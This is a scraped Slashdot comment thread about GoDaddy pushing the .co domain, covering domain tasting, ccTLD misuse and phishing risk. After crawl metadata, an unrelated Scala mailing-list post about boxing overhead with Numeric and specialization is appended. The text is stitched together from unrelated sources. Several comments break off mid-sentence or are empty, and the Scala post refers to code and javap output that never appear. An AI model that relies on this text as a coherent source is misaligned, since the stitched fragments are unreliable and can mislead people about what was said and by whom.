GoDaddy's commercials pretty much tell me that they're positioning their services as a "macho" service, and it simply doesn't m
Re:It's not mined out. (Score:5, Informative)
Get rid of domain tasting
It's pretty much gone: [wikipedia.org]
"ICANN reported in August 2009, that prior to implementing excess domain deletion charges, the peak month for domain tastings was over 15 million domain names. After the $0.20 fee was implemented, this dropped to around 2 million domain names per month. As a result of the further increase in charges for excess domain deletions, implemented starting April 2009, the number of domain tastings dropped to below 60 thousand per month."
I know from personal experience that a domain I had let lapse and was sat on for years became available again after the ICANN policy was put in place.
Re: (Score:2)
Yes, its frustrating. I am trying to come with the a
.com name and most of the a names are squatted (Registered but no website or godaddy.com website.)
Re: (Score:3, Informative)
Yes, its frustrating. I am trying to come with the a
.com name and most of the a names are squatted (Registered but no website or godaddy.com website.)
The web is not the internet. There are many more things to use a domain for than just a website.
Re: (Score:2)
You're a good couple years behind. "Tasting" is long-dead. [icann.org]
So now would you like to try again to regail us with your extensive insight into the domain name system, and the answers to all our problems?
.co for company ? (Score:4, Insightful)
are already in use as a company designator so why not ? but what about the collision with the Colombia state domain ?
Re:.co for company ? (Score:5, Funny)
...and
.co.ck
(Cook Islands, really, look it up!)
Re: (Score:2)
.co.uk
.co.jp .co.nz
are already in use as a company designator so why not ? but what about the collision with the Colombia state domain ?
You don't like
.co.co?
.co for phishing (Score:2)
It's pretty easy to pick out the "yourbank.leethaxors.com" and "batt13.net.com" spam. But with an appropriately formatted email, a link to "slashdot.co" might actually get some folks to click the link and log in to the phishing site.
-Rick
Re: (Score:3, Funny)
In return, let Canadians use the ccTLD for Western Sahara [wikipedia.org]..
Re:The right question (Score:4, Interesting)
The question we should ask ourselves is whether or not we should accept domain name registration as a commercial practice.
How about a resounding yes? The vast majority of sites on the internet are used for businesses. ".com" is short for "commercial," you know. If you want to talk about taking ".org" domains out of the commercial registration pool, there are practices that might be put in place to restrict their use in a way that ".edu" and ".gov" are used. I think you would be a little late to the party, though.
Re: (Score:2)
Just so we are clear on that, I'm not suggesting anything. I honestly do not know the right answer to this complex question myself.
But I want to put emphasis on the point that I'm talking about the registration process of a domain name, not the actual websites behind theses names. I'm referring to the fact that registrars are commercial websites themselves, employing commercial tactics I would expect from every other commercial websites or store.
Re: (Score:2)
Re: (Score:3, Interesting)
Real eastate is an extremely good model for how the DNS system should be run.
In places with significant unused land (for our purposes preserves and protected wilderness would be considered used) it is often possible to obtain ownership of such land by simply claiming it, and using it. (Law varies by nation, but this still occurs, and was far more common in the past).
In all other cases you buy land from an existing holder.
Regardless of one one obtains the land though, one must still pay any property tax, or
Godaddy mistake? (Score:2, Interesting)
Re: (Score:3, Interesting)
I use Godaddy almost exclusively for my many (too many) domains... that said, let's be honest.
It's not a mistake. Their checkout process is designed to wave as many unnecessary - yet seemingly useful - options as possible in front of novice domain customers, in hopes that one or two will fall into their basket by mistake. No doubt their logs are full of new customers landing and searching for an unavailable
.com domain, repeat, repeat, repeat, give up.
Now by defaulting to
.co and hiding .com they can sell
Re:Godaddy mistake? (Score:5, Interesting)
Yes, no mistake. They were pushing this even before it became available for sale: [godaddy.com]
'Pre-registration is now open for the newest truly global and recognizable domain name extension to come along in years:
.co -- It's used everywhere as an abbreviation for Company, Corporation, and Commerce. Let it vault your company into the global Internet marketplace!
Here's your chance to grab domain names that have been taken for years with the
.com extension. Pre-registration includes application periods for trademark holders and others.'
garbage domains (Score:2, Insightful)
Re: (Score:2)
.co is a country TLD. It's just misused, in largely the same was as
.me, .nu, and many others.
Re: (Score:2)
So is
.tv, Tuvalu.?
Of course the entire top level domain thing is largely broken from today's point of view, because it's so US-centric. Non-country domains should be global. Country domains should be somehow related to that country.
What I mean is, if you go to porn.<country tld>, you should get porn site from that country, or at least content with "performers" who are mostly from that country, and advertising meant for that country, even for foreign web clients, because presumably they're planning a vacation or somethi?
Since I live in the US, not only am I OK with it, I see it as a significant benefit!
Re: (Score:2)
Because many people who grab these domains don't understand what "their rules" are, or even that they are dealing with the rules of another country. They just think the TLD sounds cool. And the registrar (who doesn't want to lose a sale) doesn't do anything to explain it to them. Which leads to situations like this [arstechnica.com].
Re: (Score:2)
Which leads to situations like this [arstechnica.com].
Or this [theregister.co.uk]
Re: (Score:2)
country code tld's are supposed to represent sites in or at least related to that country. Misuse would be using them for sites that have nothing to do with that country.
Misusing cctlds particularly of unstable countries or ones ruled by a very different idiology to your own is a dangerous game. If the country decides they don't like your type or site or they don't like misuse in general there is little you can do about it. As someone has already pointed out registrars do nothing to explain this to their c
Let's call it scam when it is a scam (Score:3, Insightful)
Re: (Score:3, Interesting)
agreed. just another way for godaddy to profit from the clueless or too-lazy-to-read-what-they're-doing... which is a pretty large percentage of their customer base.
Regular business = scam (Score:2)
Re:Let's call it scam when it is a scam (Score:4, Interesting)
It's a scam to sell off
.co domains as .com domains, and it should be outed as such by slashdot.
I smell lawsuit. Unwary and dumb users expect to have their hands held in this day and age.
.COM domain - .CO domains are from COlumbia!" you are automatically setting yourself up for a class-action suit which you will assuredly lose or settle.
.com price. In which case, we are the sheeple and will be eaten soon by the GoDragon.
This is a really uninformed error by the world's largest registrar. If you don't have a big blue banner that says "This is NOT a
But maybe the GoDaddy lawyers already figured out the cost of the suit, the settlement and the legal fees, and the 90% markup still leaves more on the table than an ultra-competitive
Fuck the ccTLDs anyway... (Score:2)
I saw the stupid Twitter-140-character-limit-moronity-mandated URL-shortened [flic.kr] the other day, and I thought, the concept of ccTLDs are dead! Why not just use [flickr] if you're going to do that.
Yeah, the Internet is getting stupider and stupider every second...
Re: (Score:2)
Damn ACs, making all Americans look stupid and unworldly
;(
Vote with yr wallet. (Score:3, Insightful)
Re: (Score:2)
When a monopoly provides a service you desperately need, it's hard to stop them from milking you for all you're worth.
You have to maintain an internet presence these days, and failure to "keep with the times" may well jeopardize your ability to do business, hold down a job, and so on.
So you pay the piper.
Re: (Score:2, Insightful)
Re: (Score:2)
Considering how they and their competitors pull the same crap, I'd call it a de-facto cartel.
Public needs to learn not everyting is dot com (Score:2)
Re: (Score:2, Informative)
"Domaining" may be on the way out. (Score:3, Interesting)
With the October 27th change to Google web search, "domaining" may be on the way out.
Google made huge changes when they merged "Google Places" (which is really Google business search") results into their main web search results. Search for DVD player [google.com]. There are almost no "organic search results" shown. At the top, there's "Related searches for dvd player - Brands, Stores, Types". There are two "organic" results from Amazon and Best Buy, both Google advertisers. Then a big block of "shopping results" A right side column of ads.
And that's a non-local search. On searches which imply some location ("london hotels" is a good test case), Google displays a map. For a few days, they displayed a big map in the main search area; today it's on the right, above the ads. Between the big ad block at the top, the map at the right, the ads below the the map, and the links in the main search area to the map, only a few organic results are squeezed in.
Google's organic search isn't any better than it used to be at filtering out the bottom-feeders. Down below the fold on "dvd player" search, there's still a result from "bestsoftware4download" (which tries a drive-by install of some
.exe). In the "london hotels" search, there are a few junk entries. Most of the stuff visible on the first screen isn't organic search results, though. This makes "domaining" futile.
Google is still fooling around with their layout after their big change, and it hasn't settled yet. (Also, Google's layout changes if you're logged into Google and allow "personalization". The results mentioned above are not "personalized".) The trend, though, is clear. The primary results for a search with commercial intent now come from Google advertisers. Google is pushing advertisers to buy ads directly from Google, not from the "bottom feeders".
So buying up large numbers of ".co" domains may be futile. I expect we'll see many junk domains in ".com" expiring, with nobody picking them up.
Not dissimilar to CentralNic's "country" .com/.co (Score:2)
15 years ago, CentralNic pulled a similar stunt with the
.com domains - they went around and registered domains like uk.com, us.com, cn.com and ru.com and then brazenly sold subdomains off of those as if they were "top-level domains", completely with hefty charges (32.50 GBP per year for something.uk.com for example).
It ties in with this story too, because CentralNic have indeed registered uk.co and us.co as well, so I wonder when they'll try to "persuade" the publc that something.uk.co is a legit top-leve
Re: (Score:2)
Go to flat namespace (Score:2)
Why do we even have root domains? Why not simply partition load by say the last few letters of the domain name. Reserve trademarks, proper names, and other forms of identity to their rightful owners - this way say a city can register a "root" domain and sell subdomains. Or a country. Or a DNS hotel like GoDaddy. Small organizations can register with whoever they wish as a subdomain, or run their own top level if they wish. Charge a flat fee per domain to recover load costs.
And get rid of the annoying
Re: (Score:2)
Um, you don't know much about Colombia then. They have made significant advances in fighting the drug cartels. Maybe you are thinking about Mexico?
Re: (Score:2)
Why yes, yes I am. | http://tech.slashdot.org/story/10/11/13/2324256/The-Ascendancy-of-co | CC-MAIN-2016-07 | en | refinedweb |
Thank you in advance; also, any pointers on making the program better will be well appreciated. All that is required though, is that the numbers entered are greater than zero and actually numbers.
#include <iostream> #include <string> using namespace std; int numEmployees(); int daysMissed(int); double averageMiss(int, int); int main() { int employees; int sum; double average; cout << "This program calculates the average number of days missed by employees.\n"; employees = numEmployees(); sum = daysMissed(employees); average = averageMiss(sum, employees); cout << "Average number of days missed equals " << average << "\n"; return 0; } int numEmployees() { string invalid; int num; cout << "How many employees do you have?\n"; cin >> num; while(!(cin >> num) || num < 1) { cin >> invalid; cout << "You typed \"" << invalid << "\" instead of a positive integer." << "\n"; cout << "Please try again." << "\n"; } return num; } int daysMissed(int employees) { int count = 0; int sum = 0; int num; while(count != employees) { cout << "How many days did employee " << count+1 << " miss?"; cin >> num; if((cin >> num) && num > 0) { count++; sum = sum + num; } else { cout << "Invalid input!\n"; } } return sum; } double averageMiss(int sum, int employees) { double average = static_cast<double>(sum)/static_cast<double>(employees); return average; } | http://www.dreamincode.net/forums/topic/154538-testing-phase-need-help-please/ | CC-MAIN-2016-07 | en | refinedweb |
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Nov 30, 2006, at 9:40 AM, Talin wrote: > Greg Ewing wrote: >> Barry Warsaw wrote: >>> I'm not sure I like ~/.local though - -- it seems counter to the >>> app-specific dot-file approach old schoolers like me are used to. >> Problems with that are starting to show, though. >> There's a particular Unix account that I've had for >> quite a number of years, accumulating much stuff. >> Nowadays when I do ls -a ~, I get a directory >> listing several screens long... >> The whole concept of "hidden" files seems ill- >> considered to me, anyway. It's too easy to forget >> that they're there. Putting infrequently-referenced >> stuff in a non-hidden location such as ~/local >> seems just as good and less magical to me. > > On OS X, you of course have ~/Library. I suppose the Linux > equivalent would be something like ~/lib. I forgot to add in my previous follow up why I'd prefer ~/.local over ~/local. It's a namespace thing. Dot-files in my home directory are like __names__ in Python -- they don't belong to me. Non-dot-names are my namespace so things like ~/local constrain what I can call my own files. When I switched to OS X for most of my desktops, I had several collisions in this namespace. I keep all my homedir files under subversion and could not check out my environment on my new Mac until I named a few directories (this was exacerbated by the case- insensitive file system). I think in general OS X has less philosophical problem with colliding in the non-dot namespace because most OS X users don't ever /see/ their home directory. They see ~/Desktop. Maybe that's what all the kids are into these days, but I still think dot-names are better to use for a wider acceptance. - -Barry -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iQCVAwUBRW72vXEjvBPtnXfVAQJUmAP8DOQkDJm35xfpSPmvFPXYNZYRhYk8gdSk yMisPq100d5c0lGvW/LjDyLoyi96vd0IQu/WfSgzbe9MBvJ6egP2R0U9hgwytxo5 VcI7jiqel8KFRqgM+4Xqau7MGRiIBGsNX/V5tzGPBA5QP4eSSEFXh/2i9l7ciWJE bN/byz5zlXo= =8CkG -----END PGP SIGNATURE----- | https://mail.python.org/pipermail/python-dev/2006-November/070096.html | CC-MAIN-2014-15 | en | refinedweb |
Migrating an Existing Extension to JDeveloper 11gR2 -- Part Two
By John 'JB' Brock on Jun 15, 2011
We covered the basics of how to migrate an extension that does not use the Addin.initialize() method, in Part One of this topic. If you haven't taken a look at that yet, I strongly recommend that you do.
Quick review
With the release of JDeveloper 11g R2, the extension framework is now based on OSGi. Because of this, we no longer load all of the extensions at the same time, at the startup of the IDE. We now use something called Lazy Loading which only loads extensions when they are needed. Because Addin.initialize() is no longer called at IDE startup, you have to think a little more carefully about of how your extension integrates into the IDE. You can't just dump everything out there and have it ready to go.
I'm going to use the Extension SDK sample project, "OpenNodes" for this migration example.
A different point of view
The first thing we need to think about, is what user interface element can be used to trigger the loading of the rest of the extension. When we open the OpenNodesAddin class, which extends Addin, we see that there are two different things going on in the initialize() method.
A new factory object is being created and a call to a method called installViewMenu, which does exactly that. It installs a menu item into the View menu. This is exactly what we are looking for.
If we move the functionality of this method to be done declaratively in the extension.xml file's trigger-hooks section, we will be able to show the menu item in the View menu, without actually loading any of the other code in the extension. It will not get completely initialized until the menu item is selected. Go ahead and comment out the call to the installViewMenu() method and save the file.
The existing extension.xml file also contains an action element which will need to be migrated. You can refer back to Part One for information on how to modify the action element and add the now required controller element as well.
We'll focus on the installViewMenu() method and how we will migrate it's functionality over to a menu element in the extension.xml file. Here is what the existing method looks like
This is a pretty simple method that adds a menu item to the View menu on the IDE main menubar. It calls the only action that we have in the extension.xml file already. It doesn't have anything in the method that defines where the menu item is supposed to be placed within the View menu itself. We can just do the same thing and let the IDE place the menu item in the default location if we like.
Let's move over to the extension.xml file now and add our menu element to the triggers section of the file. For this example, I have already gone ahead and done the migration of the action element, as well as the changes to the reuired-bundles element.
I'm going to go ahead and add the <menu-hook> element to the bottom of the <triggers> element, right after the new <controllers> element that we added.
The <menu-hook> element has one required argument of "xmlns". We'll set this to ""
Once you have the menu-hook element started, you can use the xml schema tool in the Structure window, just as we described in Part One of this topic. We will need to add the following elements to finish the menu-hook section.
If you are not sure what values to use for the <menubar> id and <menu> id, you can refer back to a blog post I did early in 2011 about how to work with declarative menus in jdeveloper extensions.
The new trigger-hooks section is going to look like this when it's done.
We should be able to test the new version of the extension now, by doing the steps of:
-- Build
-- Deploy to target platform
-- Run Extension
The "Deploy to Target Platform" step is required in 11gR2 before you try the "Run Extension" feature. This builds the OSGi bundle so that it can be deployed properly.
Cleaning things up
Once you run the new version, you should come across two things.
1) There is a warning telling you that "registerDockableFactory" has been deprecated, after you do the compile (I'm doing a rebuild when I see this)
2) When you actually run the extension, a Warning will be thrown telling you that the <feature> hook doesn't have a corresponding <feature-member>.
While everything will run fine with these warnings in place, lets go ahead and clean things up.
To get rid of the runtime warning, let's add a <feature-member> element just before we start the <trigger-hooks> section.
The registerDockableFactory() method is being replaced with a trigger-hook. You can add this to the triggers element using the schema editor in the Structures window. The class name and id will be required.
The result will look like this.
The last thing to do, is go into the OpenNodesDockableFactory class and comment out the method that does the existing registration. Leave the ID variable declaration though. That's needed by other parts of the code.
Now if we rebuild, deploy, and run the extension, everything should work without any warnings or errors.
Conclusion
By moving the GUI elements out of the Addin.initialize() method, we can display the connections that our extension requires for the user to enable the full functionality and start usng the extension. Once the trigger is hit, the IDE will call the Addin.initialize() method and do the rest of the loading of the extension.
There may still be cases where an extension needs to load, but doesn't have a GUI element to use as a trigger. In those cases, there is usually something else that is being added to the IDE by the extension, that can be used as a trigger. Take a look at the Trigger Hooks Wiki for a list of trigger-hooks provided by the IDE, and some more information about each of them.
As usual... Comments, Comments, Comments. Toss out your experiences and questions for others to learn from. All are welcome.
Looking for information on template-hook
Posted by guest on December 15, 2011 at 06:15 AM PST #
In regards to the difference between 11gR1 and 11gR2? Or just info about template-hook in general?
The only difference is that you place the <template-hook> element in the <trigger-hook> section of an R2 extension.xml file and you add the namespace to the opening element.
<template-hook
Otherwise the elements are exactly the same in R1 and R2.
Let me know if this helps or not.
--jb
Posted by John 'JB' Brock on December 15, 2011 at 06:31 AM PST #
I have migrated an extension from R1 to R2. It works fine on my PC. When I install this extension to another PC, I got this error: java.lang.NoClassDefFoundError: oracle/ide/controller/Controller
(I use some classes from oracle.ide.jar which is in path $ORACLE_HOME$/jdeveloper/ide/extensions/ - I have this bundle in the extension.xml file in extension dependencies)
I couldn't find any reason for that. Do you have any suggestion?
Thanks
Posted by Vladimir on April 05, 2012 at 09:14 PM PDT #
This is most likely caused by a required dependency not being added to the MANIFEST.MF file.
Take a look at this blog post to see how to check if the files are being listed properly
If this doesn't work, or doesn't make sense, please contact me directly via email (john<dot>brock<AT>oracle.com and I'll be happy to help work this out with you.
Posted by guest on April 06, 2012 at 02:51 AM PDT #
IS there a way to load the extension at IDE startup? I noticed that there is a Ballon project in the extension samples that has no trigger-hooks and is loaded at IDE startup. Extensions log says that it was triggered and reason is "Marked to reload at startup" but I don't understand how it is achieved. I have also seen the same question (unanswered) here:
Posted by Aleksei Sosnovski on February 04, 2013 at 05:13 AM PST #
Hi Aleksei,
No, there is not a trigger-hook to load an extension at Startup. That would defeat the entire purpose of lazy loading of extensions. Once a developer has loaded your extension the first time, it will continue to be loaded at startup if the project that references it, is still open.
The Balloon example is an odd case in that it's actually a child of a larger extension that was already loaded. It makes it look like it's loading at startup, but it's not.
Posted by John 'JB' Brock on February 04, 2013 at 06:41 AM PST #
Thanks for the prompt reply.
If there is no out-of-the-box way to load the extension at startup, I will have to find an alternative.
There are certain features that ideally require the extension to be loaded at startup. Among many other things, it has to register a custom JavaOptionProvider. I see multiple ways to do it:
- Load the extension when (actually before) a Java process is started. It also includes starting Weblogic, at least the integrated one. Since other custom extensions may start Java processes, catching this event might be a problem.
- Load the extension when a project has Java technology. Not the best solution because AFAIK one can start integrated Weblogic without opening any projects, but it should be sufficient.
- Create a custom trigger hook that would load the extension at startup.
Which of the above solutions sounds most reasonable? And how this solution can be implemented? Unfortunately documentation on technology scope hook and custom hooks is insufficient, at least for somebody who has as little experience with JDeveloper as I do.
Posted by guest on February 04, 2013 at 11:26 PM PST #
I am migrating an extension from 11gR1 to 12c(12.1.2). I am not able to make code template work on JDev12.1.2.
In 11.1.1.5 we have the code template file under meta-inf folder and in the extension.xml file we have the following entry under hook
<code-template-hook
<templates-url>/meta-inf/code-templates.xml</templates-url>
</code-template-hook>
For 12c I am doing the same other than adding the code-template-hook under triggers section. But its not working. Is there something more i need to do ?
Posted by Apurba on July 24, 2013 at 08:13 AM PDT #
Hi Apurba, questions like this are probably best asked and answered in the forums instead of in comments of the blog.
I would re-ask this question over at:
While you're moving over there though, I would ask first if the extension loads at all? Placing this tag in the triggers section is not going to actually trigger the extension load. What are you using as a trigger-hook?
Posted by John 'JB' Brock on July 24, 2013 at 08:32 AM PDT #
I have added a Tools menu item via menu bar hook which is used to load and initialize the custom extension I am migrating for 12.1.2. Upon initializing the extension creates a custom workspace and add it to the jdeveloper content pane..
Posted by guest on July 25, 2013 at 07:21 AM PDT # | https://blogs.oracle.com/jdevextensions/entry/migrating_an_existing_extension_to1 | CC-MAIN-2014-15 | en | refinedweb |
Bugtraq
mailing list archives
Hello,
On 9 Oct Paul Boehm, whom I respect immensely for his contributions to linux
security audit list, claimed
i found this overrun some months ago and even tried to exploit it...
all i got was a shell with MY uid... then i posted it to the security
auditing mailinglist and Alan Cox pointed out that vga_init() drops
root privileges.. all you can gain from this overrun is video display
access
False. I propose a small test: three questions. The answer for each of them
lies 24 newlines below the question. 3 correct answers equals hash prompt.
I tested my exploit successfully on zgv-3.0-4, which is shipped with
redhat 5.1, overflowing with HOME env variable; I'm pretty sure it will work
with other versions of zgv, probably on other distributions as well ( debian
sources are almost identical to redhat's) .
Q1. Indeed, after the overflow our uid, euid, fsuid and saved uid are non-zero.
But what in fact is <quote>"video display access"</quote>, what resources
are required ?.
Q2. Pure technical question: How do I find the address of my task_struct ?
Answer 2. If you, carefull reader, are older then 14, you should remember
LDT exploit. Task_struct was pinpointed using pattern matching. This technique
is very powerfull, can be harnessed as well for locating struct module in LKM
which intends to be invisible. Yet there is a better method. We'll reap
the address of struct task_struct * task[] from /proc/ksyms. It's not
exported ? True. However, in kernel/sched.c, line 107, we read
<quote>
struct task_struct * task[NR_TASKS] = {&init_task, };
struct kernel_stat kstat = { 0 };
</quote>
So, the address of task is NR_TASKS*sizeof(task_struct*) less then the
address of kstat, which IS exported. When we have this address, we just need
to check pid of each task struct for equality with our pid.
The code which writes to /dev/mem is enclosed at the end of this post..
Conclusions:
1) Any suid program that uses svgalib must be secured against overflows as
tightly as any other suid binary.
2) A week ago I contacted three major Linux distributions, warning them
about the zgv insecurity. I received two responses, one of them being "We
don't ship zgv with our distro, nothing we can do". The second interlocutor
wasn't too convinced about the severity of the problem; I presented him the
exploit code, then the conversation died. If I had any doubts about
importance of full-disclosure, they're gone now.
3) In order to make this post complete, I should enclose a patch. However zgv
wasn't designed with security in mind,
[zgv-3.0-src]$ grep 'strcpy\|strcat\|sprintf\|scanf' *.c |wc -l
55
auditing it is a rather lengthy task.
The best solution seems to be to remove suid bit off zgv. It is meant
*grin* to be run from the console, and the console access usually means root
access anyway. If you need to allow untrusted users to use it, use
StackGuard-ed version. Or read
( this is an excellent Solar Designer's post on some clever method of
securing to some extent strcpy's and related), add the enclosed header file
to the end of zgv.h and recompile. This will help to defeat overflows only,
but they seem to be the only threat: zgv runs with unpriviledged uid ( so no
races and other fs tricks) , and can't be ptraced ( dumpable flag is set ).
Salute to Abbath&Demonaz, who are immortal.
Save yourself,
Nergal
PS . The code.
In order to make it work, it needs little tuning. Find in your /proc/ksyms the
address of kstat and correct the value in line 32. As you can see, this code
attempts to make /tmp/szel suid root.
BTW, if you don't enter this value properly, this code may well end up
writing stuff to random locations in kernel memory. I don't take any
responsibility for the damage it can cause :(
A note for script kiddies & idiots: you need to compose a prog which
overflows zgv yourself, then change usual /bin/sh to the code below.
------------------------------cut here-----------------------------------------
/* by Nergal */
#define SEEK_SET 0
#define __KERNEL__
#include <linux/sched.h>
#undef __KERNEL__
#define SIZEOF sizeof(struct task_struct)
int mem_fd;
int mypid;
void
testtask (unsigned int mem_offset)
{
struct task_struct some_task;
int uid, pid;
lseek (mem_fd, mem_offset, SEEK_SET);
read (mem_fd, &some_task, SIZEOF);
if (some_task.pid == mypid) /* is it our task_struct ? */
{
some_task.euid = 0;
some_task.fsuid = 0; /* needed for chown */
lseek (mem_fd, mem_offset, SEEK_SET);
write (mem_fd, &some_task, SIZEOF);
/* from now on, there is no law beyond do what thou wilt */
chown ("/tmp/szel", 0, 0);
chmod ("/tmp/szel", 04755);
exit (0);
}
}
#define KSTAT 0x001ca90c
main ()
{
unsigned int i;
struct task_struct *task[NR_TASKS];
unsigned int task_addr = KSTAT - NR_TASKS * 4;
mem_fd = 3; /* presumed to be opened /dev/mem */
mypid = getpid ();
lseek (mem_fd, task_addr, SEEK_SET);
read (mem_fd, task, NR_TASKS * 4);
for (i = 0; i < NR_TASKS; i++)
if (task[i])
testtask ((unsigned int)(task[i]));
}
By Date
By Thread | http://seclists.org/bugtraq/1998/Oct/143 | CC-MAIN-2014-15 | en | refinedweb |
Utility code for synchronizing exception detection across processors. More...
#include "Teuchos_ConfigDefs.hpp"
#include "Teuchos_TestForException.hpp"
Go to the source code of this file.
Utility code for synchronizing exception detection across processors.
Definition in file Teuchos_ErrorPolling.hpp.
TEST_FOR_EXCEPTION(Teuchos::ErrorPolling::pollForFailures(comm), \ std::runtime_error, \ "off-processor error detected by proc=" << (comm).getRank());
This macro polls all processors in the given communicator to find out whether an error has been reported by a call to ErrorPolling::reportFailure(comm).
Definition at line 128 of file Teuchos_ErrorPolling.hpp. | http://trilinos.sandia.gov/packages/docs/r10.8/packages/teuchos/doc/html/Teuchos__ErrorPolling_8hpp.html | CC-MAIN-2014-15 | en | refinedweb |
java.lang.Object
org.apache.openjpa.kernel.OpenJPASavepointorg.apache.openjpa.kernel.OpenJPASavepoint
public class OpenJPASavepoint
Represents a savepoint where operations afterwards can be rolled back and restored to this point
public OpenJPASavepoint(Broker broker, String name, boolean copy)
public Broker getBroker()
public String getName()
public boolean getCopyFieldState()
protected Map<StateManagerImpl,SavepointFieldManager> getStates()
public void save(Collection<StateManagerImpl> states)
OpenJPAStateManagers as necessary.
public void release(boolean user)
user- if true, user initiated, otherwise a side effect of another savepoint's release/rollback
public Collection<SavepointFieldManager> rollback(Collection<OpenJPASavepoint> previous)
previous- previous savepoints set in the transaction | http://openjpa.apache.org/builds/2.2.1/apidocs/org/apache/openjpa/kernel/OpenJPASavepoint.html | CC-MAIN-2014-15 | en | refinedweb |
Practical PHP Refactoring: Extract Interface
A concrete class still defines an implicit interface by itself, as the set of its public methods. When the called interface is a subset of this, or it is depended upon in multiple places, it is interesting to make it explicit.
The Extract Interface refactoring creates an interface from an existing concrete class.
Why?
Interfaces are not strictly necessary for computation: PHP is already Turing-complete without them. Interfaces describe what a collaborator should accomplish, while classes describe how, with all the necessary code. However, apart from documenting a contract between two classes, they have several benefits.
In the realm of TDD, they enable outside-in testing with mocks: this means you can test-driver a class together with the interfaces it depends upon, even if the real implementation of its collaborators do not exist, or do not implement them, yet.
Outside-in TDD helps shaping interfaces from the point of view of the caller instead of the callee. As such, these interfaces should reside in a separate folder/namespace from the implementing code (for the Dependency Inversion Principle).
What if a class has multiple calling points? It can possibly expose multiple interfaces, where every client depends exactly at most one of them and not on any additional methods.
Steps
- Create an empty interface. If you can only think of a name such as Set and ISet for a class and interface, start by saving the good name for the interface: Set and TreeBasedSet is better than the former case.
- Declare common operations in the interface, with method signatures identical to the original. In case only some operations are called by the client, only this subset should be copied in the interface.
- Add implements keywords to tie existing concrete classes to the interface.
- Simplify the client code by making it dependent on the interface where possible.
Examples of the last step are multiple:
- the tests can now use a mock or a stub easily (even coded by hand instead of a generated one), since starting from interface you'll have a small set of methods to override.
- Type hints can be written referring to the interface name whenever the client code calls only the methods listed in the interface.
- renaming the interface and the concrete classes to reflect a role (in the interface) and implementation peculiarities (in the concrete classes).
- Add or drop methods in the contract to fit the desires of the caller.
- Extract some functionality into a Decorator or a Composite, which are multiple implementation of an interface.
Example
In the initial state, the Money presenter object is depending on a concrete class, EuroLocale.
<?php class ExtractInterface extends PHPUnit_Framework_TestCase { public function testShouldDisplayAMoneyAmount() { $locale = new EuroLocale(); $money = new Money("42"); $this->assertEquals("42 €", $money->display($locale)); } } class EuroLocale { public function format($amount) { return $amount . ' €'; } } class Money { private $amount; /** * @param string $amount to keep precision */ public function __construct($amount) { $this->amount = $amount; } public function display(EuroLocale $locale) { return $locale->format($this->amount); } }
We create an interface, Locale, and just the single public method is extracted. Anything more would not be shown in this example, and won't be brought up into the interface.
interface Locale { /** * @return string */ public function format($amount); }
We add an implements keyword, and simplify the type hint dependency to target just Locale.
interface Locale { /** * @return string */ public function format($amount); } class EuroLocale implements Locale { public function format($amount) { return $amount . ' €'; } } class Money { private $amount; /** * @param string $amount to keep precision */ public function __construct($amount) { $this->amount = $amount; } public function display(Locale $locale) { return $locale->format($this->amount); } }
Usually a dependency on a concrete class, which may have a dozen different methods, does not let us refactor tests introducing Test Doubles. This happens because we are unsure about which methods we should redefine: which are called in this test method? And by Money objects in general?
Now that we have an interface, we define explicitly that only format() is called, even if EuroLocale may have many others. So we can break the tests in two, one targeting Money and the other EuroLocale. Note the order of the unit tests: they are completely independent, so we can test (and thus develop) Money first.
<?php class ExtractInterface extends PHPUnit_Framework_TestCase { public function testShouldFormatItsAmountBeforeDisplayingIt() { $locale = $this->getMock('Locale'); $locale->expects($this->once())->method('format')->with("42")->will($this->returnValue('42 SIMBOL')); $money = new Money("42"); $this->assertEquals("42 SIMBOL", $money->display($locale)); } public function testShouldFormatAnAmountWithTheEuroSighn() { $locale = new EuroLocale(); $this->assertEquals("42 €", $locale->format("42")); } }
In the real world, there would have been dozens of tests involving both objects, with a lot of setup code and machinery. Interfaces let us break direct dependencies and test classes in real isolation, an approach that scales better to many tests. For example, in the final version every test for a new formatting options (like 42.00 or 10,000.00 EUR) needs only to create a string instead of a Money object. Equivalently, any test for a new user of format() does not have to care about particular formatting rules.
(Note: Opinions expressed in this article and its replies are the opinions of their respective authors and not those of DZone, Inc.)
Filippo Tessarotto replied on Wed, 2012/01/18 - 6:54am
I consider this refactoring one of the most important:
Where "clarify" refers both to the code user and the code developer | http://css.dzone.com/articles/practical-php-refactoring-43 | CC-MAIN-2014-15 | en | refinedweb |
CGTalk
>
Software Specific Forums
>
Autodesk Mudbox
> getting 'import as layer' to work
PDA
View Full Version :
getting 'import as layer' to work
pavstudio
03-30-2007, 04:00 AM
Hi,
I'm using Mudbox v1.03 and am having trouble using the 'import as layer' feature. Everytime I try it I get an error. I've tried all of the settings and have tried it on multiple computers. Has anyone else had this problem? If someone who has used this successfully could give me a quick run through of how they do it, I'd appreciate it.
Thanks in advance!
oglu
03-30-2007, 07:53 PM
try the newest version... 1.06..
mabe your mesh isnt clean or bad uvs..?
fx81
03-30-2007, 09:01 PM
import as layer was fine in 1.03 aswell. you dont need the new 1.06 upgrade for that.
if you are using maya, check the second tutorial (Maya Mudbox Workflow 2). it should explain.
CGTalk Moderation
03-30-2007,. | http://forums.cgsociety.org/archive/index.php/t-480100.html | CC-MAIN-2014-15 | en | refinedweb |
- : Avoiding boxing/unboxing with specializations and numeric
Thu, 2011-12-01, 21:34
Oops! Could this please be moved to scala-user! I posted to the wrong list by accident.
Re: Re: Avoiding boxing/unboxing with specializations and numer
Just forward your original message to scala-user. (You can edit the subject and body so it doesn't look forwarded, if you like.)
On Thu, Dec 1, 2011 at 3:34 PM, marc <millstone [at] gmail [dot] com> wrote:
On Thu, Dec 1, 2011 at 3:34 PM, marc <millstone [at] gmail [dot] com> wrote:
Oops! Could this please be moved to scala-user! I posted to the wrong list by accident.
I thought now would be a good time to post the following: Currently, much of my codeis hardcoded to double and I wanted to generalize this to handle Double or Ints withouta performance loss.
Below is a simple example I wrote up demonstrating the problems I am experiencing(as well as javap output).
This code simply creates a class that accepts a List[T] and will compute its sum.If T is an Int, we want an Int back and similarly if T is a Double.Observations: 1) It seems we have to implicitly go through Numeric to handle this use case, requiring the useof plus and zero as opposed to + and 0.2) Although the class itself is specialized, we have to pay a boxing/unboxing penalty forthe use of the plus operator in the recursion. Obviously, this is inherently tied to havingto go though the implicit conversion to Numeric.
Obviously, this example is very simple, but I hope it is so simple that some of thesemicro-optimization techniques can be better explained.
Is this just the way it is or am I missing something with using this functionality?
Thank you all in advance,
